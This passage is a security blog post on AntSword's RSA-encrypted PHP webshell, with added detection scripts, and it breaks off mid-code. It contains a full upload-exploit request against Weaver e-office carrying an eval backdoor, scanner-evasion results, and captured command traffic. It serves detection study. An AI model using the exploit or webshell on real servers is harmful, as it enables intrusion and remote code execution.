AntSword (中国蚁剑) RSA Asymmetric Encryption: Attack and Defense

admin, 2022-06-26 18:59:37

0x00 Preface

This test is for learning purposes only. If it is put to illegal use, that has nothing to do with the platform or the author of this article; you bear the responsibility yourself!




0x01 AntSword (中国蚁剑)

AntSword (中国蚁剑) is an open-source, cross-platform website management tool aimed at legally authorized penetration testers and at website administrators performing routine operations. Its traffic is obfuscated with encoders and decoders, which can bypass detection systems such as WAFs and IDSs, and it ships with a range of practical plugins. This makes it very convenient for security testers and popular with many people.

https://github.com/AntSwordProject/antSword



0x02 Generating the RSA webshell

Online RSA key-pair generator

http://web.chacuo.net/netrsakeypair

Generate the public and private keys


Starting with AntSword v2.1.0, a PHP RSA encoder was added: the tool has a built-in RSA encoder module that uses RSA asymmetric encryption for transport. Create a new encoder -> RSA configuration -> click "generate key pair", then fill in the public key, the private key and the PHP code to produce a webshell dedicated to AntSword connections.


Encoder settings


Check whether the generated webshell evades scanners

D盾 (D-Shield) scan: detected


冰河 webshell scanner: not detected


火绒 (Huorong) scan: not detected


0x03 Attack test

Upload the webshell through a 泛微 (Weaver) e-office vulnerability

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 1289
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg

<?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCjjg16ibX4sUv4fkHmijeD5M3G
88Tp4ge9PWaYiUtXm23Tq3iEpZtpe6DkWbbLZvufHZWOQjv9sDEg5aCoeJOftRxv
JOj+nqPb3oydsxOBzuoaquE6/ZcK4ZwYF4FipaOP0uctEc49uFQnBeneJLnrKx1e
W0EArkolkjFKe8Y4DQIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
    if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
        $cmd .= $de;
    }
}
eval($cmd);
--e64bdf16c554bbc109cecef6451c26a4--
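As an added example (not code from the original post or from the AntSword project), the following Python script performs the static check a webshell scanner would apply to the file uploaded above: it flags PHP that reads request input, passes it through openssl_public_decrypt and hands the result to eval, and it parses the embedded PEM public key to report the RSA modulus size. The first sample is the webshell from the upload request; the second is a constructed, hypothetical benign script that also calls openssl_public_decrypt on request input but never executes the result.

```python
import base64
import re

# Sample 1: the PHP webshell carried in the upload request above (copied from the page).
RSA_SHELL_PHP = r'''<?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCjjg16ibX4sUv4fkHmijeD5M3G
88Tp4ge9PWaYiUtXm23Tq3iEpZtpe6DkWbbLZvufHZWOQjv9sDEg5aCoeJOftRxv
JOj+nqPb3oydsxOBzuoaquE6/ZcK4ZwYF4FipaOP0uctEc49uFQnBeneJLnrKx1e
W0EArkolkjFKe8Y4DQIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
    if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
        $cmd .= $de;
    }
}
eval($cmd);
'''
# Sample 2 (constructed, hypothetical): a licence check that also feeds request input to
# openssl_public_decrypt but only prints a field of the result instead of executing it.
BENIGN_PHP = r'''<?php
$pk = openssl_pkey_get_public(file_get_contents('/etc/app/license.pub'));
if (openssl_public_decrypt(base64_decode($_POST['license']), $out, $pk)) {
    echo json_decode($out)->expires;
}
'''
PEM_RE = re.compile(r"-----BEGIN PUBLIC KEY-----(.*?)-----END PUBLIC KEY-----", re.S)


def _read_tlv(buf: bytes, pos: int):
    """Read one DER tag/length header; return (tag, value_start, value_end)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                          # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, pos, pos + length


def rsa_modulus_bytes(pem: str) -> int:
    """Walk SubjectPublicKeyInfo -> BIT STRING -> RSAPublicKey; return modulus length in bytes."""
    b64 = "".join(ln.strip() for ln in pem.strip().splitlines() if not ln.startswith("-----"))
    der = base64.b64decode(b64, validate=True)
    tag, p, _ = _read_tlv(der, 0)              # SubjectPublicKeyInfo SEQUENCE
    if tag != 0x30:
        raise ValueError("not a SEQUENCE")
    _, _, alg_end = _read_tlv(der, p)          # AlgorithmIdentifier SEQUENCE (skipped)
    tag, p, _ = _read_tlv(der, alg_end)        # BIT STRING wrapping RSAPublicKey
    if tag != 0x03:
        raise ValueError("expected BIT STRING")
    _, p, _ = _read_tlv(der, p + 1)            # RSAPublicKey SEQUENCE (after the unused-bits byte)
    tag, p, n_end = _read_tlv(der, p)          # modulus INTEGER
    if tag != 0x02:
        raise ValueError("expected INTEGER")
    return len(der[p:n_end].lstrip(b"\x00"))   # drop the DER sign byte


def scan_php_for_rsa_shell(src: str) -> dict:
    """Static indicators of the AntSword RSA webshell pattern, plus the embedded key size."""
    f = {
        "reads_request_input": bool(re.search(r"\$_(POST|GET|REQUEST|COOKIE)\b", src)),
        "uses_public_decrypt": "openssl_public_decrypt" in src,
        "dynamic_code_execution": bool(re.search(r"\b(eval|assert|create_function)\s*\(", src)),
        "embedded_public_key": PEM_RE.search(src) is not None,
        "rsa_modulus_bytes": None,
    }
    if f["embedded_public_key"]:
        try:
            f["rsa_modulus_bytes"] = rsa_modulus_bytes(PEM_RE.search(src).group(0))
        except (ValueError, IndexError):
            pass                                # malformed key: keep the indicator, report no size
    # All four indicators together describe the shell above; any one alone is common in benign code.
    hit = all(f[k] for k in ("reads_request_input", "uses_public_decrypt",
                             "dynamic_code_execution", "embedded_public_key"))
    f["verdict"] = "rsa-encoded webshell" if hit else "no match"
    return f


if __name__ == "__main__":
    for name, src in (("uploaded test.php", RSA_SHELL_PHP), ("benign licence check", BENIGN_PHP)):
        print(name, scan_php_for_rsa_shell(src))
```

The verdict is deliberately conservative and requires all four indicators, which is why the constructed licence check stays clean even though it calls openssl_public_decrypt on user input. The reported modulus size (128 bytes for this 1024-bit key) is also the size of every ciphertext block the webshell expects, which ties the file-level finding to the traffic captures later in the post.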




Webshell connection URL

Test setup (encoder RSA + decoder default)

http://10.211.55.9:8082/images/logo/logo-eoffice.php



Connection test succeeded





Configure an HTTP proxy to capture and analyze the connection traffic

Proxy configuration (alternatively, capture and analyze with Wireshark)





The first interaction packet

Encoder RSA + decoder default




Encoder RSA + decoder base64



Encoder RSA + decoder rot13



URL-decoding and then base64-decoding the request data yields unreadable bytes



Analysis of the encoder shows that the transmitted data is encrypted with RSA public-key cryptography and base64-encoded for transport, which is how the traffic evades detection.


Connection traffic analysis

1. Base64:

POST /images/logo/logo-eoffice.php HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
Content-Length: 2810
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

ant=YKc6gcTqiGacc%2FQ1PuCLeTUqaFsw2fOatVSzW0S1PsntU45VuBvI5msgplm%2FVJAD1o8bsswCt4UGXIw1epWyDPzFPgkAJilJr8OkwcI%2BWTV5m7n8AIhF0yOOPAocSH5iGI6m4oNt%2FQ7MBqCy1F0oT%2Fr4pBoH5OftueQi8dDLcuQ%3D%7CSupGNjon8my%2BNiArG6zK%2FcGQVH0nYrKqCyIjuWXexSpTNykDJ9kYxryrix1HOym%2FPewhjWj2LnQnwyp33mHGPRUoMb8IsXEQIgeeLOjV08LbkWb3dYzYDen3dMxLrMZz4r4rLsp4uenqc30g4X%2BQo4szxCdD1EveL%2F28FK5YJrY%3D%7CdhXaJmNV0FpVQrVFx6MsN5G%2Bxh9bdaSW5XGp%2FlP4wmB9oqAOFSbB66ONMkJjV6vBUzpLzkVxWu3CaqVwHobgHjCTpnqEtTzJ9PDLwznYDtiZeLwdeobxxJbS52L5kLFV4Q8Cs%2FGVJ3ZkmlZC0n5u0OL6Mz7oj5DpSJOxv76E3tY%3D%7CkmVlk8oig5gTjkdM0xwxLgWmICsSHgy52C4tOIHmQqW%2FJ7Th2k%2FalpjDcEXS5noQU4cGRum1zYYMyqb89feasu9FubYi872JIQWFTV1J90lwmRzesTnO1kbw%2BDDwYTZJFAqJv7oz5gzqCvtWayKwI5xC18DtJmaWGQ2pRB3h2js%3D%7CNHKMyZ5UX6GdF1aLhPgLlsx7cRILuWFgZ8LDzdFBAOjd3gsvlng0YDPYdPEgl6KEXQkOvDkRBq2vrRpDCCt2X7PjFxJxVhZQP%2FpjhEmcEp8lSJYNja6BTSSqRo3Z0TKa78rdeGwEJAAEg%2BLLKJearYOLalLqH12iaw%2BfcnY0XwI%3D%7CdAgPN66G8RP4J7KY935hmeMw12JG9QYNgLdxDwJ3JiMv4orLbq%2B5nOzH6VgXWgnUytZHtpaTf2FFr4KA3oZnSltLurBBvAXxuFiMcSr%2Bqg%2Fd1jDWI4mAsC8Z5Uz8TRBGmm1mcYNwE56u4ezW3Cjkf2nBmJmCkBUAOQQTvIW6zt0%3D%7CRbe5CDwSBZcic9Esr%2FeKg%2BJLii1A%2ByWJMGfaWrrp0%2BnXw4PYAGGT8IQHKzhdMF1GycKYPhKw4kV2szN%2FElP7rlP7gNMGxHhCGUOB%2FJlTwd4c2Z%2FHVfG4F0RLHfKqyIXii8UzRKvzicJVjk4tQV4VUuaaB%2BJqzRsfwJlh8ZxjJA0%3D%7CJ0GD%2F5W1bJCwfqWeJjRP7Crjfi5uwx%2FZh%2Bpq1pcbNtEtoqrc9J4tR27sWfVz9WY0oRVlZkajbUz9F%2B4nMe%2Fa5v%2FVEHYYjNRArOck9jrzQ9N9w%2F7qc%2FLtlR5Z%2BXgRAWw6HRI3SXQz7iI2Tr2yX%2Fc5uI7okY%2BrfwMClpXSuuHTEo8%3D%7CfohHb1C%2FzUJ77%2FIEAwmRISV%2BzsdeAygjtWPfb7XFDG3tfogdhGWxhyIm%2FgxwDbeW8%2B8qmGowryWHiGpSFc%2BdsflpoMVREYgreQAuuOKsccqVF%2B7O5hPj0wslH%2F8RXz99hu4M2RXxDGMKPi1Zjyt2xIeV0%2B0vVujqCoqj8JqaGnI%3D%7CDQBBTstRO9SvIktPWRtQPyD6qNX9Sb%2Fbyw4Err34XmvCo1pbYAqNdYzzngpKyx1ZnrH8fpHkhxEhkUiFiurfpqHiJQ6oVloYf90B%2FddykmZFkw4190%2B2rb0Hbw%2BSrduJEU7hWlKrMDqaG3Z8o8idVtbFXvihW4sM2qrKtXD5i1g%3D%7CMDHjjdGMDiHzsG94H340Z2VsjBceQ8YHaVx1SaslqoLMbTA9hov1EMTlYZm0Muy4jBin4i880UzrVBkxQBG%2F%2BeHP%2BToRLNilJZm6OJYMRdBTdSCR4qovem5W27HHaHUkZx%2BtcrvfKIA32GaFWymX3bGWHLBEe6z8xsFmqAhDjXQ%3D%7CNOGyWuBDmTeOBQmrAIdjUHR%2FfTXfW8eQSegmMwiDuOrNuETjirFOw6%2F1WwSev5CZ8jJKxMdc90o8rCXsqKl65wXzLyZuEcLWDVFb0Sdd06yr9W5D0Cec%2FyuYlxksHE9mzL%2F99uZsaCV4ETMIAHUl1IzoCwDKbNMWS6%2BuG0COlfs%3D%7CMgpQIzjmORFWFlnySqPz9TVXlg6LrZdZbWkdPDVx%2BU7zUzfcx3sAfPc7go90ketoIlFwqCa8xHf34Z7D0nPYV5n3c3GGO5IA0ASa%2Fark%2B9fPNYHQtx1H%2FjHmfrzJxnJY47BYXjkxlxx6qnszI%2FyVVDLgycd8VymeNZCRbsSF7ds%3D%7Cm7u0n8JL6%2BVeztHHYUwBwWCVuCb7V3xumKaLxKZpKqz7udyJxg36ZzCjnGu7hGmFbB2CFhl7LCk%2BCNRTniQM6AP0fXsYOYdQVLivY%2FeLSFN15dfUcjkgZGjMqejtIXdB2ovYqBIH%2FCsl1gjgwWLPX1jgLHwt23XvdZFhCEdqBik%3D%7CZS4P86VmcXviTY5mBBYs4HfEhMLBypZQ%2Fnh9aPkgiDonbEMAshMh%2BhHLVxPQhKvBoodun9SkOSnVKLKdcbR%2BEFdlRkEpEC42SVxQqFKV2fPaRlYDA8%2BeXsH07WE9MLg3laVgHFLI2BUs9r1yLMH6Cqsy79FJvacW%2FBDKX9Ql1uM%3D

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2022 08:41:37 GMT
Server: Apache/2.0.47 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 118
Connection: close
Content-Type: text/html; charset=utf-8

721d11efQzovZW9mZmljZS93ZWJyb290L2ltYWdlcy9sb2dvCUM6RDoJV2luZG93cyBOVCBZVU5aVUktUEMgNi4xIGJ1aWxkIDc2MDEJU1lTVEVNffc472

2. chr

POST /images/logo/logo-eoffice.php HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Content-Length: 2840
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

ant=YiXyFq%2Fprrg4evrbbiKnLPUMXcUjdDNePMJiFvnkuQsNf%2F2bDDbV%2BglxW6TWK%2F%2F%2F45rsR%2BY%2Fm8iLhcUt0IshzxbHC7bOLa7eKLCcuSOVLtJnAbQhG7oVEc76uBlsdCU5Wu7mPLWBYTHhhRNPwtvdlOIQbdFaxto3o17MWy9L3yw%3D%7Cc4NlNm5agVTJHbfPp%2FW2a3I1hd%2BBudSZyVUQcZAqNHsCIoPUqoxXX5p5AA1doeA2zCtn%2Feg8p3TB4UAPJbzSW%2B7Te2x62oNkRdDh%2FVr6ZlEbAG5pZC%2B0cI8GL48drvdjVECuDj74gEll9BCRW6GFpxnZXFfpMECOO3r6ZllbEnk%3D%7CLW5%2FbREDZoax%2FDbAk7ZJr%2FTPM9kfxuTZI%2F0amfCcwRAsUnuYCZ77xYtZHQTSIfXn3zw85Cr5slp5SQkReurmsAE4pIpc4IaJDQstl3zuT%2B6bH9FJa%2FSaSxMTmrUAg7k59J3z%2BkGzYwcOlp1%2BObtBHkQVZQ9xEuW2yr1QTHD%2FfJ0%3D%7Cnmv4HxDpKTfWcvCqOORZ0ccm%2FhpNNQ7XJGJPMdKx3G2xojU7C%2BKaOEBqVPPMrYJRRdVPWApUj2fSAPEeCQi87TeFm78adpzbtZmrYta7TQYFROF3UFv0hMgBvQw6ONutQntgE0GaCFRVqVC6b6ZqkUJUvHM8B8Zu9FKPzngUwlU%3D%7ChrQwyxH9%2FJx6LFT0VNv0cSd%2Ff2yzVw%2BOJiclxUKcEhV8q%2FM1Tx0Zx%2FNizuGpB%2FmmNBfzeMffSZkMxeWEtEYQK%2F4in1rK4T3RF1nZ06cneuI45rD1959C2mLSjVul0AKaFvZSTW0vL5laM4rYl1BHBhWblgVcbUWi5B6dRnk%2BjCE%3D%7CnevocVhkYRoAcVraHcND49w%2FGgpYxQM4jc1n8J%2FHrEfjNnbJmCKabgsFUb2TGmv5i0n%2FfLzTSQ%2FBo1kBztiWU4pTSBJ3iv2UBhPMG9LEB9xH%2FbkQWIa2ePIr56YWmvfN6fXy1F6lW7T7%2F4FIE%2F4DDb4jgwUncWFA504ogCNLW7E%3D%7Cdl1Wo3bpS5Elt0Q2bonJZmPJAioe3g3s%2Fx%2FfK%2F8UtCXzUhhY3kxKJb9itP%2BbPbrrbUY6lAdl13G0BE%2F2SdtFiD0Kx9b4RN30r6l8jsuJla7uc01LX%2BHjBcojGdIYr23P%2FSzZBHVffNCSljfTJbYlDO5sPJ%2FgmoBtJOLEoP0Hi70%3D%7CBTj0kRvK6GPmDn0uEm%2Fm8F3%2BsxItr1h4hR3zdVa1VF%2B%2FNXUqS3uBETvN9qPLWhGUBZfMdL1j3Vjv7vMqNQBZuxqZ2Z0irD1AWzjQrI5gaZOi0mICY67eJKWeY95udeharJ5tPVaQv9Id1jeLEKk1H2r0acEpUGpCJWtCPX%2BIWBI%3D%7CiwHLtTeNpssZ%2BLjVBEBZuNzpFkPFSRlhhzLu29D7aT%2FHRz%2BBtgT8sZuPTGJnEC6QXo0hhEzHLtZ%2BVnvGqGPGt0pNi3eGBy%2FLdAdXtigPepjtLv0EAETm%2FmJvGfgrPhM0yRAQz9AGky%2BltYhoU4uVPsWBUDR7owEZKotewpiym7k%3D%7CVLoJK05GULezBTpPlin%2FUuWZnZXg%2BFkzCUqB5eAvjiUYb6SMZPUvnI9L1KBQcJnpaT81t5O3GRufjybWYv8Y359IgxluNh6WajnkcFWXZnTAowH%2FOH8Was%2BQ9C3XCOX7kkJQEbWS7ifS%2BZJ76sfnDScEblc5iaD4jLn43isa9vE%3D%7CbPwMmWNCNQbhqma%2FLEtS18P9eLlPU4tOt3BBQb%2FwGriS9Qo%2FvDCgsb6FDkVpr27U807dvKa7ybpReM1%2FWuXVpTIFs6UeV9Tt0U6o8Edr5c5cOyYHY%2BHk0Q6%2FY8hxaWxi8GSXqlLBU3tXk817APkZq55Gdgzvha%2F6xR24K5LUW68%3D%7CTa8OgzCIJ8M39TVsfYIjfCqfgnbJU2eEFCHE1QcxeCCj78khr2hl3971WnDpiFRcvqGrHJJg2nb%2FfWf%2BhGVRuixitEktqdDf612Jg%2BZyYe40TZI%2F4AUpGjX17TNdVAjNRW4U8vL89p3%2BYwcLQyjCUgSsEsiSfOoqJOQOZcRpv4I%3D%7CA8vIoVGO2xL1mrc9GyqXBfrflBO6fsYMoZuyqYQLtdOaLxPbQlcXAPThxjizMdKeKTV0Vz8Ia9x7a6Kdz%2F928YeE6OqyNlord1aCy%2BHKRYlPnn7waenQnhkNke283xdnK5rcH7u5YmAgbcAqttNmI13jNMeTcgDIIvF7hBXsz14%3D%7CHmDv190rZS9yiVLSTLvquni0hNxuGPM%2BjUgko3n4yy2NyrYd38qmD6fXdMwE%2B2sqx9ihwnLSVRF%2FjJ8y%2B2w0JjHpzHwqtNXgAXEppAAKHrFLPvFIU%2BJ8LaqnZu%2FAZKp%2Bucb2KbpNkeOx8bjH5yk0v7qc%2BsKvvvjifHtNaIOd0us%3D%7CMnW67HYNEpuFHTxLbP3pR4AsckEbsGB03bS2fYGndibUuILPvqdsdbuU6rdrKTAZluKY%2BeFstXEgLKPK%2F4rWhPou%2FsyO%2ForB%2BnwbaKRmsSHaIdb6rH6GrmWg5wUzoliKi5iiUb4tk5wyE46MsRGmaAweg1bpCvUWlCF6GKc8ekA%3D

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2022 08:41:40 GMT
Server: Apache/2.0.47 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 91
Connection: close
Content-Type: text/html; charset=utf-8

4629930P:/rbssvpr/jroebbg/vzntrf/ybtb     P:Q:     Jvaqbjf AG LHAMHV-CP 6.1 ohvyq 7601     FLFGRZa9b886


3. default

POST /images/logo/logo-eoffice.php HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Content-Length: 2828
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

ant=YiXyFq%2Fprrg4evrbbiKnLPUMXcUjdDNePMJiFvnkuQsNf%2F2bDDbV%2BglxW6TWK%2F%2F%2F45rsR%2BY%2Fm8iLhcUt0IshzxbHC7bOLa7eKLCcuSOVLtJnAbQhG7oVEc76uBlsdCU5Wu7mPLWBYTHhhRNPwtvdlOIQbdFaxto3o17MWy9L3yw%3D%7Cc4NlNm5agVTJHbfPp%2FW2a3I1hd%2BBudSZyVUQcZAqNHsCIoPUqoxXX5p5AA1doeA2zCtn%2Feg8p3TB4UAPJbzSW%2B7Te2x62oNkRdDh%2FVr6ZlEbAG5pZC%2B0cI8GL48drvdjVECuDj74gEll9BCRW6GFpxnZXFfpMECOO3r6ZllbEnk%3D%7CLW5%2FbREDZoax%2FDbAk7ZJr%2FTPM9kfxuTZI%2F0amfCcwRAsUnuYCZ77xYtZHQTSIfXn3zw85Cr5slp5SQkReurmsAE4pIpc4IaJDQstl3zuT%2B6bH9FJa%2FSaSxMTmrUAg7k59J3z%2BkGzYwcOlp1%2BObtBHkQVZQ9xEuW2yr1QTHD%2FfJ0%3D%7Cbrg6%2BKZM7B3qYLLGppGHJ1q7yCTBr3Z6pGLX0LL87I2pQD%2BzHLt1amHKmgeQ0cEA2Y9Wp3ae11u9%2FFGcxL3YScRGu8r043fdD%2BqbSOivWbbVPbUfVv1rLCtNXyqXudWxlGJ9ACID%2Fa0ibhzyaMv9v11IupPPHXiMlPL6rw7P05k%3D%7CTyo5lbtjtq5GT3KcoNqbuL4b%2Fm4paol7bahEj%2Bas5GzKu%2BQu3M1Vm3TpSnPiTfE9xRtlvPFj8nnNnPJ%2FW1HFuDMxYw4hpcSWSQq%2FyrSEfAG1oMHDHsOj5VZE6OkHnkR%2BJv9MBDHBCrPPfLkMODATBPT2gN%2BMVNgiyIkQWmHeaSI%3D%7CekPxfn%2FJQweaqz9RdL2Xx7AyBznz3eNqY2KWCnFX3fuR2McHrvrtl2MVXgKogqQrhfFa96Ee%2B1EaJYwzk%2FcxUV0%2FzUE5YWbQFZQuH3znmR0Jd33aVZrvhDMtD23xsLw6BhaMOtQ8k8Ieoi5lt7GjDIiAAThFsSXnSXL%2Fydy15YI%3D%7Ci6C2yHJJ%2BENE%2BYAb%2F1DarE4I3Vvnz2MvVeI%2B4PH6xNKEkGNWL1dxuit7OBprlU4zF7H4r4TMTGP9dsl6eSEOL14W%2Fh888UKTVQb6h5wafxkekR6SNqMvWGdQ010UNgqZ%2BD4h5zJgFEsJc293y8ORS%2FNUpcOzqWuL2DE91SbvhPI%3D%7CAJNFE62mMKRdrNqeZQwIzsrKmnZir%2FC3nh2LF4zHhpLml%2BrEROR6pxq8VoxEyOJ4HqBokufQaXcTbliLpqdKBLXawRMoFLxB%2FcUEgnPH6QnTcGp2o4dIQyNzkC6imdYaKsTGHMMMzpcbnk1Mm2bmJu%2FH9KdAJ2RFHoWqwQm1Ox8%3D%7CRWtP1JCbFMwbB7AJkUoSoostVOcASOo65xFis3HlwhJEWPgeRFMZ7J%2Fxlalobf26%2BGn3KqG69Wou%2BkMEyULuE6UqWzVBCTvU7ZNxybEApDKkD4AJRukbdhm47MpdiGblkHrqZUvMP4Q6XrJ78a93F1qZpzulGbEBKEC2dvaudEs%3D%7Cj%2FOjvw1xVxaA4jBBbpKI%2FW1TqccJnkSa3KunBHn3Kr8lYMGS8bUSlN1HryluZQcdjn6%2B44JKhYmTqXsgmyxGCjAehNgZ1RhPDJSAx9%2FJrMbxTmXWNQjMiYIgISIHIMmwrgc4HflRmzx3XG3ArVCJbKPb1EbgJ6kFVRJKSrmvYuw%3D%7CUV%2BfJc43%2FEH02EQDYkQ%2BU8rx6CKtkkQcKLJufm%2B7zKxUjuwEeYI9pKCDXfxQCw3pgakeH3qxBMLA5iJBtp1kQgMXwqrjRxOmq37vqdEXE7NRbDXzSReD4I9Rn860ACvhqEuIHmxSuTR7QlDcmd%2Bhu2Q5jR0yMIlwEEkyIkAIef0%3D%7CeDVGOZ%2FbXT7Yt0bddjGpbAW6WCwd3f0szgeT0zLQH%2BGaRpTaHR1qzgKlJ1HdQAWLZKlTkeghqtgvTSWJdmPZXkCLVnuf3pDcWlkNWLAiIAWJGcjRu5WyZyyDQBUQuI%2FHinSIs01P2RygKyGxMdG6QfKCgEZzjw7e3f%2FkMR%2Bu4YQ%3D%7CZDF%2FGyXt35XIuWB9U9U6aIzYU3g2yIsmmAlHeWF8E5yjwKCE5Zt7fpzoh1ouDK%2B21lRIVz9QFjQHTq8EZw%2FVfLiONMC9Jq1Ju%2FTH%2F1Suwlyf%2Bwa914vs1Z0r%2Bh8udvkU%2FkweuaVoNGmp30VlU%2FW9XC%2B93DN%2F67FE%2BidxUXA5O%2B4%3D%7Cg4f7XkR0Mf8PqCpKoVekbCAKw582AiYfHhpLGo3XASJ9SEMzub5FuOrw7cd7UVUXXQHqkayiHyUh2kq%2BV7WiLtei9Sq92fp9xVWN32J8voiGsfEnBm1lPcwZbmFSa0vhzdrVmxphOarJg2wFrpYlcpY58GmlFNCwCnam52J1q9Q%3D%7CH8oR66x2cJmVBtkyuAYeFyrsqPcSSRSXCymHKK2Tbt%2FquUXV1uFmewppEt%2Fw2UDb7ARQNXXOEhCAYAyzlZaYSvWBUwejUoLIR5wzwjAzVZpIxe8xZQSfnrEjNd7aM6Fp%2FYJgwa7wSpcKeIQ%2BkUslFpEv53StQycn6hV9pJl4WXc%3D

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2022 08:41:34 GMT
Server: Apache/2.0.47 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 92
Connection: close
Content-Type: text/html; charset=utf-8

a96ed3a93C:/eoffice/webroot/images/logo     C:D:     Windows NT YUNZUI-PC 6.1 build 7601     SYSTEM690a7








0x04 Detection recommendations

AntSword builds a great deal of attack-versus-defense thinking into both its design and its usage. Three detection recommendations follow:

First, detect the upload of the RSA webshell at the attack entry point, using static detection rules, a sandbox, or a webshell scanning engine (on traffic, behavior, etc.).

Second, detect AntSword's strong traffic-side indicators; these can be studied and extracted from the analysis above.

Third, use threat hunting for all-round monitoring; when an anomaly is found, trace it back through full-packet capture to locate the attack.
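As an added example (not code from the original post or from the AntSword project), the following Python script implements the traffic-side check of the second recommendation over the captures above, serving both the "data decodes to garbage" observation and the indicator-extraction step. On the request side it URL-decodes the ant parameter, splits it on "|", base64-decodes every chunk and tests whether all chunks are exactly one RSA block long (128 bytes here, the size of the 1024-bit key in the webshell). Because the shell calls openssl_public_decrypt, each chunk was produced with the private key held by the operator, so a sensor cannot recover the command and has to detect on structure instead. On the response side it strips the random hex strings AntSword places before and after the output and decodes the body for the base64 and rot13 decoders (the response in the second capture is rot13-encoded, as its bytes show); the three response bodies are taken from the captures, with tabs restored where the page shows runs of spaces. The request sample is the first two chunks of the first capture; the login form, the affix search window of up to 12 characters, and the table of RSA block sizes are assumptions.

```python
import base64
import binascii
import codecs
import re
from urllib.parse import parse_qs

# Request body: "ant=" plus the first two "|"-separated chunks of the base64 capture above (page data).
RSA_REQUEST = (
    "ant=YKc6gcTqiGacc%2FQ1PuCLeTUqaFsw2fOatVSzW0S1PsntU45VuBvI5msgplm%2FVJAD1o8bsswCt4UGXIw1epWyDPzFPgkAJilJr8OkwcI%2BWTV5m7n8AIhF0yOOPAocSH5iGI6m4oNt%2FQ7MBqCy1F0oT%2Fr4pBoH5OftueQi8dDLcuQ%3D"
    "%7CSupGNjon8my%2BNiArG6zK%2FcGQVH0nYrKqCyIjuWXexSpTNykDJ9kYxryrix1HOym%2FPewhjWj2LnQnwyp33mHGPRUoMb8IsXEQIgeeLOjV08LbkWb3dYzYDen3dMxLrMZz4r4rLsp4uenqc30g4X%2BQo4szxCdD1EveL%2F28FK5YJrY%3D"
)
# Constructed benign form post for contrast ("hello world" in base64).
LOGIN_REQUEST = "user=alice&pass=hunter2&ant=SGVsbG8gd29ybGQ%3D"

# Response bodies from the three captures above (page data), tabs restored.
RESP_BASE64 = ("721d11efQzovZW9mZmljZS93ZWJyb290L2ltYWdlcy9sb2dvCUM6RDoJV2luZG93cyBOVCBZVU5aVUktUEMg"
               "Ni4xIGJ1aWxkIDc2MDEJU1lTVEVNffc472")
RESP_ROT13 = "4629930P:/rbssvpr/jroebbg/vzntrf/ybtb\tP:Q:\tJvaqbjf AG LHAMHV-CP 6.1 ohvyq 7601\tFLFGRZa9b886"
RESP_DEFAULT = "a96ed3a93C:/eoffice/webroot/images/logo\tC:D:\tWindows NT YUNZUI-PC 6.1 build 7601\tSYSTEM690a7"

# Ciphertext block sizes in bytes for 512- to 4096-bit RSA moduli (assumed table).
RSA_BLOCK_SIZES = {64, 128, 256, 384, 512}


def rsa_block_profile(form_body: str, param: str = "ant") -> dict:
    """URL-decode `param`, split on '|', base64-decode each piece, check for uniform RSA-sized blocks.

    parse_qs turns a literal '+' into a space, so '+' inside a chunk must arrive as %2B,
    which is how AntSword sends it in the captures above."""
    pieces = parse_qs(form_body, keep_blank_values=True).get(param, [""])[0].split("|")
    sizes = []
    for piece in pieces:
        try:
            sizes.append(len(base64.b64decode(piece, validate=True)))
        except (binascii.Error, ValueError):
            return {"chunks": len(pieces), "block_size": None, "rsa_encoded": False}
    size = sizes[0] if len(set(sizes)) == 1 else None
    # Two or more equal, RSA-sized opaque blocks joined by '|' is the encoder's fingerprint.
    return {"chunks": len(pieces), "block_size": size,
            "rsa_encoded": size in RSA_BLOCK_SIZES and len(pieces) >= 2}


def _printable_ratio(data: bytes) -> float:
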